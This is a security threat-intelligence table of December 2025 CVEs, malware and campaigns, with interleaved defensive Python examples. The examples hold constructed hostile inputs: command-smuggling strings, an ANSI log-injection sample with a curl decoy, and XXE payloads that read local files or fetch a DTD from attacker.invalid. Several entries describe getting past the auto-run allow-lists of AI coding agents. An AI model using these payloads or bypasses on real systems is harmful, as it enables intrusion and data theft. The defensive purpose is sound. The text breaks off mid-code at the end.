| DATE | NAME | INFO | CATEGORY | SUBCATEGORY |
|---|---|---|---|---|
| 13.12.25 | CVE-2025-54100 | PowerShell Remote Code Execution Vulnerability | VULNERABILITY | |
| 13.12.25 | CVE-2025-64671 | GitHub Copilot for JetBrains Remote Code Execution Vulnerability | VULNERABILITY | |
| 13.12.25 | CVE-2025-62221 | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | VULNERABILITY | |
| 13.12.25 | Ransomware Trends in Bank Secrecy Act Data Between 2022 and 2024 | This Financial Trend Analysis (FTA) focuses on ransomware patterns and trends identified in Bank Secrecy Act (BSA) data. The Financial Crimes Enforcement Network (FinCEN) is issuing this report pursuant to section 6206 of the Anti-Money Laundering Act of 2020 (codified at 31 U.S.C. § 5318(g)(6)(B)), which requires periodic publication of BSA-derived threat pattern and trend information. | REPORT | RANSOMWARE |
| 13.12.25 | TOTOLINK X5000R (AX1800 router) lacks authentication for telnet | An unauthenticated HTTP request can enable telnet, which may lead to remote code execution with root-level privileges. | ALERT | ALERT |
| 13.12.25 | Vulnerabilities identified in PCIe Integrity and Data Encryption (IDE) protocol specification | PCI Express Integrity and Data Encryption (PCIe IDE), introduced in the PCIe 6.0 standard, provides link-level encryption and integrity protection for data transferred across PCIe connections. | ALERT | ALERT |
| 13.12.25 | EtherHiding | Hiding Web2 Malicious Code in Web3 Smart Contracts | HACKING | MALWARE |
| 13.12.25 | CVE-2025-42928 | Under certain conditions, a high-privileged user could exploit a deserialization vulnerability in SAP jConnect to launch remote code execution. | VULNERABILITY | |
| 13.12.25 | CVE-2025-55754 | Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in Apache Tomcat. Tomcat did not escape ANSI escape sequences in log messages. | VULNERABILITY | |
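The Tomcat entry above is a log-injection class of bug: a request field that reaches a log file verbatim can carry ESC-introduced terminal control sequences (clear the screen, retitle the window, forge a second log record with CR/LF) that a terminal or log viewer executes when an operator reads the log. The following is an added example, not Tomcat's own code, showing the neutralization a logger should apply (every C0 control byte made visible as \xNN) next to a detector that pulls the sequences out for alerting. The sample field values are constructed; the hostname in them is a placeholder.

```python
import re

# Constructed sample values: what an attacker-controlled request field (User-Agent,
# path, header) might carry if the logger wrote it to a terminal unmodified.
SAMPLE_FIELDS = [
    "Mozilla/5.0 (X11; Linux x86_64)",                          # benign
    "\x1b[2J\x1b[H[INFO] all clear",                            # CSI: clear screen, home cursor, fake line
    "\x1b]0;pwned\x07curl http://example.invalid/x",            # OSC: set terminal title, then a decoy
    "evil\r\n127.0.0.1 - - [01/Jan/2025] \"GET /admin\" 200",   # CRLF: forge a second log record
]

# ECMA-48 control sequences: CSI (ESC [ params intermediates final), OSC (ESC ] ... BEL or ESC \),
# and any other two-byte escape (ESC + one byte). Used for detection only.
_ANSI = re.compile(
    r"\x1b\[[0-?]*[ -/]*[@-~]"              # CSI: params 0x30-0x3F, intermediates 0x20-0x2F, final 0x40-0x7E
    r"|\x1b\][^\x07\x1b]*(?:\x07|\x1b\\)"   # OSC terminated by BEL or by ST (ESC \)
    r"|\x1b.",                              # any other ESC sequence
    re.DOTALL,
)

# Every C0 control byte except TAB (0x09), plus DEL (0x7F). LF and CR are included on
# purpose: a raw newline lets the value forge a whole additional log line.
_C0 = re.compile(r"[\x00-\x08\x0a-\x1f\x7f]")


def sanitize_for_log(value: str) -> str:
    """Neutralize, do not strip: each control byte becomes the literal text \\xNN, so the
    evidence survives in the log while no terminal ever interprets it.
    ESC -> \\x1b, CR -> \\x0d, LF -> \\x0a."""
    return _C0.sub(lambda m: "\\x%02x" % ord(m.group()), value)


def find_control_sequences(value: str) -> list[str]:
    """Return the terminal control sequences present in a raw value, for a detection rule
    that flags requests trying to manipulate whoever reads the logs."""
    return [m.group() for m in _ANSI.finditer(value)]


if __name__ == "__main__":
    for field in SAMPLE_FIELDS:
        print(repr(sanitize_for_log(field)), find_control_sequences(field))
```

Escaping rather than deleting is the better choice for forensics: the sanitized line still shows exactly what was sent, and a grep for `\x1b[` over the log finds every attempt.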
| 13.12.25 | CVE-2025-42880 | Due to missing input sanitization, SAP Solution Manager allows an authenticated attacker to insert malicious code when calling a remote-enabled function module. | VULNERABILITY | |
| 13.12.25 | Operation MoneyMount-ISO | Phishing campaign analysis: targeted sectors, initial findings, the phishing mail, the infection chain, stage 1 (malicious ISO file), stage 2 (executable), and the first and second payloads, the second being Phantom Stealer. | OPERATION | OPERATION |
| 13.12.25 | Operation FrostBeacon | Operation FrostBeacon: Multi-Cluster Cobalt Strike Campaign Targets Russia. Covers key targets, geographical focus, industries affected, and initial access by the LNK cluster. | OPERATION | OPERATION |
| 13.12.25 | GROUP 123 | Group123 is a North Korean state-sponsored advanced persistent threat (APT) group active since at least 2012. It is also tracked under other names such as APT37, Reaper, and | APT | APT |
| 13.12.25 | Golang Stealer | This week, SonicWall Capture Labs Threat Research Team analyzed a sample of SalatStealer. This is a Golang malware capable of infiltrating a system and enumerating through browsers, files, cryptowallets and systems while embedding a complete array of monitoring tools to push and pull any data on disk. | MALWARE | STEALER |
| 13.12.25 | ValleyRAT | Cracking ValleyRAT: From Builder Secrets to Kernel Rootkits | MALWARE | RAT |
| 13.12.25 | SetcodeRat | SetcodeRat Exposed: A Telegram Secret Stealing Trojan Customized for Chinese-speaking Regions | MALWARE | RAT |
| 13.12.25 | PyStoreRAT | PyStoreRAT: A New AI-Driven Supply Chain Malware Campaign Targeting IT & OSINT Professionals | MALWARE | RAT |
| 13.12.25 | BlackForce | Technical Analysis of the BlackForce Phishing Kit | PHISHING | KIT |
| 13.12.25 | Spiderman | Spiderman Phishing Kit Mimics Top European Banks With A Few Clicks | PHISHING | KIT |
| 13.12.25 | GhostFrame | Threat Spotlight: Introducing GhostFrame, a new super stealthy phishing kit | PHISHING | KIT |
| 12.12.25 | AshTag | Hamas-Affiliated Ashen Lepus Targets Middle Eastern Diplomatic Entities With New AshTag Malware Suite | MALWARE | MALWARE |
| 12.12.25 | AridViper | AridViper, an intrusion set allegedly associated with Hamas | GROUP | GROUP |
| 12.12.25 | CVE-2025-55182 | Meta React Server Components Remote Code Execution Vulnerability | VULNERABILITY | |
| 12.12.25 | CVE-2025-58360 | OSGeo GeoServer Improper Restriction of XML External Entity Reference Vulnerability | VULNERABILITY | |
| 12.12.25 | CVE-2025-55184 | (CVSS score: 7.5) - A pre-authentication denial of service vulnerability arising from unsafe deserialization of payloads from HTTP requests to Server Function endpoints, triggering an infinite loop that hangs the server process and may prevent future HTTP requests from being served. | VULNERABILITY | |
| 12.12.25 | CVE-2025-67779 | (CVSS score: 7.5) - An incomplete fix for CVE-2025-55184 that has the same impact. | VULNERABILITY | |
| 12.12.25 | CVE-2025-55183 | (CVSS score: 5.3) - An information leak vulnerability that may cause a specifically crafted HTTP request sent to a vulnerable Server Function to return the source code of any Server Function. | VULNERABILITY | |
| 12.12.25 | CVE-2024-55947 | Gogs is an open source self-hosted Git service. A malicious user is able to write a file to an arbitrary path on the server to gain SSH access to the server. The vulnerability is fixed in 0.13.1. | VULNERABILITY | |
| 12.12.25 | CVE-2025-8110 | Improper symbolic link handling in the PutContents API in Gogs allows local execution of code. | VULNERABILITY | |
| 12.12.25 | NANOREMOTE | The fully-featured backdoor we call NANOREMOTE shares characteristics with malware described in REF7707 and is similar to the FINALDRAFT implant. | MALWARE | BACKDOOR |
| 12.12.25 | SOAPwn | SOAPwn: Pwning .NET Framework Applications Through HTTP Client Proxies And WSDL | EXPLOIT | EXPLOIT |
| 12.12.25 | PeerBlight | PeerBlight Linux Backdoor Exploits React2Shell CVE-2025-55182 | MALWARE | BACKDOOR |
| 10.12.25 | CVE-2025-54100 | (CVSS score: 7.8) - A command injection vulnerability in Windows PowerShell that allows an unauthorized attacker to execute code locally. | VULNERABILITY | |
| 10.12.25 | CVE-2025-64671 | (CVSS score: 8.4) - A command injection vulnerability in GitHub Copilot for JetBrains that allows an unauthorized attacker to execute code locally. | VULNERABILITY | |
| 10.12.25 | CVE-2025-62223 | Microsoft Edge (Chromium-based) for Mac Spoofing Vulnerability | VULNERABILITY | |
| 10.12.25 | CVE-2025-62221 | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | VULNERABILITY | |
| 10.12.25 | CVE-2025-54131 | Cursor is a code editor built for programming with AI. In versions below 1.3, an attacker can bypass the allow list in auto-run mode with a backtick (`) or $(cmd). | VULNERABILITY | |
| 10.12.25 | CVE-2025-59458 | In JetBrains Junie before 252.284.66, 251.284.66, 243.284.66, 252.284.61, 251.284.61, 243.284.61, 252.284.50, 252.284.54, 251.284.54, 251.284.50, 243.284.54, 243.284.50, code execution was possible due to improper command validation. | VULNERABILITY | |
| 10.12.25 | CVE-2025-54377 | Roo Code is an AI-powered autonomous coding agent that lives in users' editors. In versions 3.23.18 and below, Roo Code does not validate line breaks (\n) in its command input, allowing a bypass of the allow-list mechanism. The project appears to lack parsing or validation logic to prevent multi-line command injection. | VULNERABILITY | |
| 10.12.25 | CVE-2025-57771 | Roo Code is an AI-powered autonomous coding agent that lives in users' editors. In versions prior to 3.25.5, Roo Code fails to properly handle process substitution and single ampersand characters in the command parsing logic for auto-execute commands. | VULNERABILITY | |
| 10.12.25 | CVE-2025-65946 | Roo Code is an AI-powered autonomous coding agent that lives in users' editors. Prior to version 3.26.7, due to an error in validation it was possible for Roo to automatically execute commands that did not match the allow-list prefixes. This issue has been patched in version 3.26.7. | VULNERABILITY | |
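The Cursor, Junie and Roo Code entries above all describe the same failure: an auto-run allow-list compared as a string prefix, bypassed by whatever the shell interprets after that prefix (backticks, $(cmd), a line break, process substitution, a single &). The following is an added example, not code from any of those projects, that places the prefix check next to one that rejects shell metacharacters and compares whole argv tokens. The allow-list and the probe strings are constructed; the trailing `id` in each probe is a harmless stand-in for whatever an attacker would actually run.

```python
import re
import shlex

# Constructed allow-list: commands an agent may run without asking the user.
ALLOWED = ("git status", "git diff", "npm test", "ls")

# Constructed probes, one per bypass class named in the CVE texts above. Each one
# starts with an allowed prefix, and each one runs 'id' as a second command.
PROBES = {
    "backtick": "git status `id`",
    "dollar_paren": "git status $(id)",
    "newline": "git status\nid",
    "process_subst": "ls <(id)",
    "ampersand": "ls & id",
    "semicolon": "git status; id",
}


def naive_is_allowed(cmd: str) -> bool:
    """Prefix check as a string comparison. Passes every probe above: the agent only
    looks at the first characters, the shell decides where the first command ends."""
    return cmd.startswith(ALLOWED)


# Anything a POSIX shell would treat as more than a plain word.
_SHELL_META = re.compile(r"[`$();&|<>\n\r\\]")


def hardened_is_allowed(cmd: str) -> bool:
    """Refuse anything the shell could reinterpret, then compare whole tokens so that
    'ls' does not also admit 'lsblk' and 'git diff' does not admit 'git diffx'."""
    if _SHELL_META.search(cmd):
        return False
    try:
        argv = shlex.split(cmd)      # honours quoting: "git 'st'atus" becomes ['git', 'status']
    except ValueError:               # unbalanced quotes
        return False
    if not argv:
        return False
    return any(argv[: len(prefix)] == prefix for prefix in (a.split() for a in ALLOWED))


if __name__ == "__main__":
    for name, probe in PROBES.items():
        print(f"{name:14} naive={naive_is_allowed(probe)!s:5} hardened={hardened_is_allowed(probe)}")
```

The token check only means something if the agent then executes `argv` directly (for example `subprocess.run(argv)` with no shell); handing the validated string back to `sh -c` reintroduces every bypass the regex just rejected. Rejecting `$` also blocks legitimate `git diff $FILE`, which is the intended trade: the agent can expand the variable itself before the check.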
| 10.12.25 | CVE-2025-9612 | (Forbidden IDE Reordering) - A missing integrity check on a receiving port may allow re-ordering of PCIe traffic, leading the receiver to process stale data. | VULNERABILITY | |
| 10.12.25 | CVE-2025-9613 | (Completion Timeout Redirection) - Incomplete flushing of a completion timeout may allow a receiver to accept incorrect data when an attacker injects a packet with a matching tag. | VULNERABILITY | |
| 10.12.25 | CVE-2025-9614 | (Delayed Posted Redirection) - Incomplete flushing or re-keying of an IDE stream may result in the receiver consuming stale, incorrect data packets. | VULNERABILITY | |
| 10.12.25 | GOLD BLADE | Sharpening the knife: GOLD BLADE's strategic evolution | APT | APT |
| 10.12.25 | JS#SMUGGLER | JS#SMUGGLER: Multi-Stage - Hidden Iframes, Obfuscated JavaScript, Silent Redirectors & NetSupport RAT Delivery | MALWARE | JAVASCRIPT |
| 10.12.25 | APT-C-08 | WinRAR CVE-2025-6218 Exploit: In-Depth Analysis of the APT-C-08 Directory Traversal Attack | APT | APT |
| 10.12.25 | CVE-2025-8088 | A path traversal vulnerability affecting the Windows version of WinRAR allows attackers to execute arbitrary code by crafting malicious archive files. This vulnerability was exploited in the wild and was discovered by Anton Cherepanov, Peter Košinár, and Peter Strýček from ESET. | VULNERABILITY | |
| 10.12.25 | CVE-2025-6218 | RARLAB WinRAR Path Traversal Vulnerability | VULNERABILITY | |
| 10.12.25 | CVE-2025-62221 | Microsoft Windows Use After Free Vulnerability | VULNERABILITY | |
| 10.12.25 | CVE-2025-59719 | An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, and FortiWeb 7.4.0 through 7.4.9 may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message. | VULNERABILITY | |
| 10.12.25 | CVE-2025-59718 | An improper verification of cryptographic signature vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11, FortiOS 7.0.0 through 7.0.17, FortiProxy 7.6.0 | VULNERABILITY | |
| 10.12.25 | EtherRAT | EtherRAT: DPRK uses novel Ethereum implant in React2Shell attacks | MALWARE | RAT |
| 10.12.25 | CastleLoader | GrayBravo’s CastleLoader Activity Clusters Target Multiple Industries | MALWARE | LOADER |
| 10.12.25 | Storm-0249 | Threat Spotlight: Storm-0249 Moves from Mass Phishing to Precision EDR Exploitation | APT | APT |
| 8.12.25 | CVE-2025-2611 | The ICTBroadcast application unsafely passes session cookie data to shell processing, allowing an attacker to inject shell commands into a session cookie that are executed on the server. This results in unauthenticated remote code execution in the session handling. Versions 7.4 and below are known to be vulnerable. | VULNERABILITY | |
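The ICTBroadcast entry above is the classic shape of command injection: a value the client fully controls (a cookie) spliced into a command line that a shell then parses. The following is an added example, not ICTBroadcast's code, showing that pattern as a command string that is built but never run, next to the two fixes a practitioner reaches for: strict validation of the value's format and an argv-style call that never involves a shell, with `shlex.quote` as the fallback when a shell is unavoidable. The cookie values and the script path are constructed.

```python
import re
import shlex
import subprocess

# Constructed: a session id the attacker simply sets in their own Cookie header.
# 'id' is a harmless stand-in for the command they would really append.
HOSTILE_COOKIE = "abc123; id"
GOOD_COOKIE = "3f9a0c7e2b1d4e8fa6c5b4d3e2f1a0b9"

LOOKUP_SCRIPT = "/opt/app/session_lookup.sh"     # constructed path


def vulnerable_command(session_id: str) -> str:
    """The bug class in the text: the raw cookie value is interpolated into a shell
    command line. Returned as a string, not executed, so it can be inspected safely;
    handing this string to 'sh -c' would run everything after the ';'."""
    return f"{LOOKUP_SCRIPT} {session_id}"


def quoted_command(session_id: str) -> str:
    """Fallback when a shell string really is required: shlex.quote wraps the value
    so the shell sees one word, and the ';' becomes part of the argument."""
    return f"{LOOKUP_SCRIPT} {shlex.quote(session_id)}"


# Session ids issued by the constructed application: exactly 32 hex characters.
_SESSION_ID = re.compile(r"[A-Fa-f0-9]{32}")


def safe_lookup(session_id: str) -> str:
    """Validate the format first, then call with an argv list and no shell, so the
    value reaches the child as a single argument however it is spelled.
    'echo' stands in for the lookup script so the example runs anywhere."""
    if not _SESSION_ID.fullmatch(session_id):
        raise ValueError("malformed session id")
    result = subprocess.run(["echo", session_id], capture_output=True, text=True, check=True)
    return result.stdout.strip()


if __name__ == "__main__":
    print("vulnerable:", vulnerable_command(HOSTILE_COOKIE))
    print("quoted:    ", quoted_command(HOSTILE_COOKIE))
    print("safe:      ", safe_lookup(GOOD_COOKIE))
```

Validation and argv execution are independent layers: the format check stops the hostile value at the door, and the argv call guarantees that even a value which slips past a looser check can only ever be data to the child process.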
| 8.12.25 | | The Sneeit Framework plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 8.3 via the sneeit_articles_pagination_callback() function. This is due to the function accepting user input and then passing it through call_user_func(). | VULNERABILITY | |
| 8.12.25 | SEEDSNATCHER | Dissecting an Android Malware Targeting Multiple Crypto Wallet Mnemonic Phrases | MALWARE | ANDROID |
| 8.12.25 | ClayRat | Return of ClayRat: Expanded Features and Techniques | MALWARE | RAT |
| 8.12.25 | FvncBot | New FvncBot Android banking trojan targets Poland | MALWARE | ANDROID |
| 8.12.25 | UDPGangster | MuddyWater campaign analysis reveals macro-based delivery, extensive anti-analysis techniques, and shared infrastructure links | CAMPAIGN | CAMPAIGN |
| 7.12.25 | Snowlight | A malware dropper that allows remote attackers to drop additional payloads on breached devices. | MALWARE | DROPPER |
| 7.12.25 | Vshell | A backdoor commonly used by Chinese hacking groups for remote access, post-exploitation activity, and to move laterally through a compromised network. | MALWARE | BACKDOOR |
| 7.12.25 | CVE-2025-55182 | A pre-authentication remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0, including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints. | VULNERABILITY | |
| 7.12.25 | CVE-2022-41049 | Windows Mark of the Web Security Feature Bypass Vulnerability | VULNERABILITY | |
| 7.12.25 | CVE-2025-49150 | Cursor is a code editor built for programming with AI. Prior to 0.51.0, by default, the setting json.schemaDownload.enable was set to true. This means that by writing a JSON file, an attacker can trigger an arbitrary HTTP GET request that does not require user confirmation. | VULNERABILITY | |
| 7.12.25 | CVE-2025-53097 | Roo Code is an AI-powered autonomous coding agent. Prior to version 3.20.3, the Roo Code agent's `search_files` tool did not respect the setting to disable reads outside of the VS Code workspace. | VULNERABILITY | |
| 7.12.25 | CVE-2025-58335 | In JetBrains Junie before 252.284.66, 251.284.66, 243.284.66, 252.284.61, 251.284.61, 243.284.61, 252.284.50, 252.284.54, 251.284.54, 251.284.50, 243.284.54, 243.284.50, information disclosure was possible via the search_project function. | VULNERABILITY | |
| 7.12.25 | CVE-2025-53773 | Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio allows an unauthorized attacker to execute code locally. | VULNERABILITY | |
| 7.12.25 | CVE-2025-54130 | Cursor is a code editor built for programming with AI. Cursor allows writing in-workspace files with no user approval in versions less than 1.3.9. If the file is a dotfile, editing it requires approval but creating a new one doesn't. | VULNERABILITY | |
| 7.12.25 | CVE-2025-53536 | Roo Code is an AI-powered autonomous coding agent. Prior to 3.22.6, if the victim had "Write" auto-approved, an attacker with the ability to submit prompts to the agent could write to VS Code settings files and trigger code execution. | VULNERABILITY | |
| 7.12.25 | CVE-2025-55012 | Zed is a multiplayer code editor. Prior to version 0.197.3, the Zed Agent Panel allowed an AI agent to achieve Remote Code Execution (RCE) by bypassing user permission checks. | VULNERABILITY | |
| 7.12.25 | CVE-2025-64660 | Improper access control in GitHub Copilot and Visual Studio Code allows an authorized attacker to execute code over a network. | VULNERABILITY | |
| 7.12.25 | CVE-2025-61590 | Cursor is a code editor built for programming with AI. Versions 1.6 and below are vulnerable to Remote Code Execution (RCE) attacks through Visual Studio Code Workspaces. | VULNERABILITY | |
| 7.12.25 | CVE-2025-58372 | Roo Code is an AI-powered autonomous coding agent that lives in users' editors. Versions 3.25.23 and below contain a vulnerability where certain VS Code workspace configuration files (.code-workspace) are not protected in the same way as the .vscode folder. | VULNERABILITY | |
| 7.12.25 | CVE-2025-55182 | Meta React Server Components Remote Code Execution Vulnerability | VULNERABILITY | |
| 7.12.25 | CVE-2025-47322 | Memory corruption while handling IOCTL calls to set mode. | VULNERABILITY | |
| 7.12.25 | CVE-2025-47320 | Memory corruption while processing MFC channel configuration during music playback. | VULNERABILITY | |
| 7.12.25 | CVE-2025-27063 | Memory corruption during video playback when a video session open fails with a timeout error. | VULNERABILITY | |
| 7.12.25 | CVE-2025-47321 | Memory corruption while copying packets received from Unix clients. | VULNERABILITY | |
| 7.12.25 | CVE-2025-47387 | Memory corruption when processing IOCTLs for JPEG data without verification. | VULNERABILITY | |
| 7.12.25 | CVE-2025-47350 | Memory corruption while handling concurrent memory mapping and unmapping requests from a user-space application. | VULNERABILITY | |
| 7.12.25 | CVE-2025-47325 | Information disclosure while processing system calls with invalid parameters. | VULNERABILITY | |
| 7.12.25 | CVE-2025-47323 | Memory corruption while routing GPR packets between user and root when handling a large data packet. | VULNERABILITY | |
| 7.12.25 | CVE-2025-47372 | Memory corruption when a corrupted ELF image with an oversized file size is read into a buffer without authentication. | VULNERABILITY | |
| 7.12.25 | CVE-2025-47319 | Exposure of Sensitive System Information to an Unauthorized Control Sphere in HLOS | VULNERABILITY | |
| 6.12.25 | RondoDox | Tracking RondoDox: Malware Exploiting Many IoT Vulnerabilities | MALWARE | IOT |
| 6.12.25 | HashJack Attack | HashJack Attack Targets AI Browsers and Agentic AI Systems | ATTACK | AI |
| 6.12.25 | CVE-2025-54988 | Critical XXE in Apache Tika (tika-parser-pdf-module) in Apache Tika 1.13 through and including 3.2.1 on all platforms allows an attacker to carry out XML External Entity injection via a crafted XFA file inside of a PDF. An attacker may be able to read sensitive data or trigger malicious requests to internal resources or third-party servers. | VULNERABILITY | |
| 6.12.25 | CVE-2025-66516 | Critical XXE in Apache Tika tika-core (1.13-3.2.1), tika-pdf-module (2.0.0-3.2.1) and tika-parsers (1.13-1.28.5) modules on all platforms allows an attacker to carry out XML External Entity injection via a crafted XFA file inside of a PDF. This CVE covers the same vulnerability as CVE-2025-54988. | VULNERABILITY | |
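The two Tika entries above (and the GeoServer one further up) share one root cause: an XML parser that honours entity declarations in a document the attacker authored, so `<!ENTITY x SYSTEM "file:///...">` reads a local file and a `SYSTEM "http://..."` reference makes the server issue a request. XFA is simply XML carried inside a PDF, so the same defence applies to the extracted stream. The following is an added example, not Tika's code, of the pre-parse gate a hardened consumer applies: run a throwaway expat pass with handlers that abort on any entity declaration or external DTD before the real parser ever sees the document. The XFA-style fragments are constructed and reduced to the parts that matter; the hostname is a placeholder.

```python
import xml.parsers.expat
from xml.etree import ElementTree as ET


class ExternalEntityError(ValueError):
    """Raised when a document declares entities or references an external DTD."""


# Constructed XFA-style fragments (real XFA streams are much larger).
BENIGN_XFA = b"""<?xml version="1.0"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"><form1><name>alice</name></form1></xdp:xdp>"""

# Classic file read: the entity body is whatever /etc/hostname contains.
XXE_XFA = b"""<?xml version="1.0"?>
<!DOCTYPE xdp [ <!ENTITY secret SYSTEM "file:///etc/hostname"> ]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"><form1><name>&secret;</name></form1></xdp:xdp>"""

# Out-of-band variant: a parameter entity that makes the parser fetch a remote DTD.
SSRF_XFA = b"""<?xml version="1.0"?>
<!DOCTYPE xdp [ <!ENTITY % dtd SYSTEM "http://attacker.invalid/evil.dtd"> %dtd; ]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"/>"""

# External DTD on the DOCTYPE itself, no internal subset at all.
EXTDTD_XFA = b"""<?xml version="1.0"?>
<!DOCTYPE xdp SYSTEM "http://attacker.invalid/xdp.dtd">
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"/>"""


def check_no_entities(data: bytes) -> None:
    """Scan the document with expat, aborting the instant it sees an entity declaration
    (internal or external) or a DOCTYPE that points at an external DTD. Exceptions raised
    inside expat handlers propagate out of Parse(), which is what stops the scan."""
    parser = xml.parsers.expat.ParserCreate()

    def on_entity(name, is_parameter_entity, value, base, system_id, public_id, notation_name):
        raise ExternalEntityError(f"entity declaration {name!r} (SYSTEM={system_id!r})")

    def on_doctype(doctype_name, system_id, public_id, has_internal_subset):
        if system_id or public_id:
            raise ExternalEntityError(f"external DTD {system_id or public_id!r}")

    parser.EntityDeclHandler = on_entity
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)


def safe_parse(data: bytes) -> ET.Element:
    """Gate first, then parse for real. ElementTree is only reached by documents that
    declare nothing, so there is nothing left for it to resolve."""
    check_no_entities(data)
    return ET.fromstring(data)


if __name__ == "__main__":
    for label, doc in [("benign", BENIGN_XFA), ("xxe", XXE_XFA), ("ssrf", SSRF_XFA), ("extdtd", EXTDTD_XFA)]:
        try:
            print(label, "->", safe_parse(doc).tag)
        except ExternalEntityError as exc:
            print(label, "-> rejected:", exc)
```

Rejecting the whole document rather than neutralizing individual entities is deliberate: no legitimate XFA or configuration payload from an untrusted source needs a DTD, and a reject-on-sight gate has no parser-specific behaviour left to get wrong.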
| 6.12.25 | CVE-2025-1338 | A vulnerability was found in NUUO Camera up to 20250203. It has been declared as critical. This vulnerability affects the function print_file of the file /handle_config.php. The manipulation of the argument log leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | VULNERABILITY | |
| 6.12.25 | V3G4 Botnet | CRIL has uncovered an active V3G4 campaign using a Mirai-derived botnet alongside a fileless, runtime-configured cryptominer. | BOTNET | BOTNET |
| 6.12.25 | Operation DupeHike | Targeted campaign analysis: key targets, industries affected, geographical focus, infection chain, the decoy document, stage 1 (malicious LNK script), stage 2 (DUPERUNNER implant), stage 3 (AdaptixC2 beacon), and infrastructure artefacts. | OPERATION | OPERATION |
| 5.12.25 | Benzona Ransomware | A new ransomware operation known as Benzona has surfaced, showing signs of rapid development and growing confidence. The malware encrypts victim files using the “.benzona” extension and drops a ransom note titled RECOVERY_INFO.txt, warning that sensitive data has already been exfiltrated. Victims are given a 72-hour deadline to negotiate via a Tor-based chat portal, with threats of data publication should they refuse. | RANSOM | |
| 5.12.25 | DupeRunner and AdaptixC2 malware deployed within the Operation DupeHike | The SEQRITE researchers have uncovered a targeted cyber espionage campaign dubbed Operation DupeHike. The campaign is focused on various sectors including HR, payroll, and administrative departments. The attack utilizes sophisticated social engineering tactics, deploying realistic decoy documents centered on employee financial bonuses to lure victims. | OPERATION | |
| 5.12.25 | Symbiote and BPFdoor Linux malware variants implement new eBPF filters | Symbiote and BPFdoor are two Linux malware strains known to use Berkeley Packet Filter (BPF) packet sniffing to monitor network traffic and respond only on already-open ports, bypassing firewall rules and network protections. As reported by researchers from Fortinet, both malware families have recently added new extended Berkeley Packet Filters (eBPF) to the distributed payloads. | VIRUS | |
| 5.12.25 | Datebug APT deploys malware targeting BOSS Linux systems | The Pakistan-based advanced persistent threat (APT) group known as Datebug (aka APT36, Transparent Tribe, Storm-0156) is reported to be behind recent attacks targeting Indian government entities running Bharat Operating System Solutions (BOSS) Linux. | APT | |
| 5.12.25 | CVE-2025-61757 - Oracle Fusion Middleware vulnerability | CVE-2025-61757 is a recently disclosed critical (CVSS score 9.8) missing authentication vulnerability affecting the Identity Manager product of Oracle Fusion Middleware. If successfully exploited, the flaw gives unauthenticated attackers with HTTP network access the ability to compromise Identity Manager, up to takeover of the vulnerable Identity Manager instance. | VULNERABILITY | |
| 5.12.25 | CVE-2025-12480 - Gladinet Triofox vulnerability | CVE-2025-12480 is a recently disclosed critical (CVSS score 9.1) improper access control vulnerability affecting the Gladinet Triofox file server and storage solution. If successfully exploited, the flaw allows unauthenticated remote attackers to reach the vulnerable application's configuration pages and from there upload and execute arbitrary payloads. | VULNERABILITY | |
| 5.12.25 | LotusHarvest malware deployed in Operation Hanoi Thief | SEQRITE Labs’ researchers have identified "Operation Hanoi Thief," a malicious cyber campaign targeting IT professionals and HR recruiters in Vietnam. The campaign employs spear-phishing emails containing fake resumes to deliver malware used to steal confidential user data. | OPERATION | |
| 5.12.25 | Arkanix Stealer | Researchers at G DATA recently observed a new infostealer dubbed Arkanix. According to their findings, it was initially built in Python and distributed via Discord as a fake “utility,” but it quickly evolved — a native C++ “premium” version now exists, complete with VMProtect obfuscation. Its capabilities are standard for commodity stealers. | VIRUS | |
| 5.12.25 | Albiriox mobile RAT | Albiriox is a new Android malware operating under a Malware-as-a-Service (MaaS) model, designed to facilitate on-device fraud, VNC-based remote control and overlay attacks. As reported by researchers from Cleafy, the malware spreads through social engineering, specifically targeting Austrian victims via fake applications distributed through SMS and WhatsApp lures. | VIRUS | |
| 5.12.25 | CVE-2025-34299 - Monsta FTP vulnerability | CVE-2025-34299 is a recently disclosed critical (CVSS score 9.3) arbitrary file upload vulnerability affecting Monsta FTP (version 2.11.2 and earlier). If successfully exploited, the flaw allows unauthenticated remote attackers to achieve arbitrary code execution by uploading a specially crafted file from a malicious SFTP or FTP server. | VULNERABILITY | |
| 5.12.25 | Duc contains a stack buffer overflow vulnerability in the buffer_get function, allowing for out-of-bounds memory read | Duc, an open-source disk management tool, contains a stack-based buffer overflow vulnerability allowing for out-of-bounds memory read. | ALERT | ALERT |
| 5.12.25 | Insufficient Session Cookie Invalidation in nopCommerce ASP.NET Core eCommerce Platform | nopCommerce, an ecommerce platform, fails to invalidate session cookies upon user logout or session termination, enabling attackers to use the captured cookie to gain access to the application. This vulnerability is extremely similar to CVE-2019-7215. | ALERT | ALERT |
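The nopCommerce entry above describes a session that outlives logout: the server never revokes anything, so a cookie captured before logout keeps authenticating afterwards. The root of that behaviour is a purely stateless authentication cookie, where "logout" can only ask the browser to forget the value. The following is an added example, not nopCommerce's code, placing a minimal stateless signed cookie next to a server-side session store and running the same capture, logout, replay sequence against both. The key, user name and token format are constructed.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)    # constructed; a real service loads this from configuration


class StatelessCookie:
    """Cookie = user + HMAC over the user. Nothing is kept on the server, so logout has
    nothing to revoke: a copy captured earlier verifies until the key rotates."""

    def issue(self, user: str) -> str:
        mac = hmac.new(SERVER_KEY, user.encode(), hashlib.sha256).hexdigest()
        return f"{user}:{mac}"

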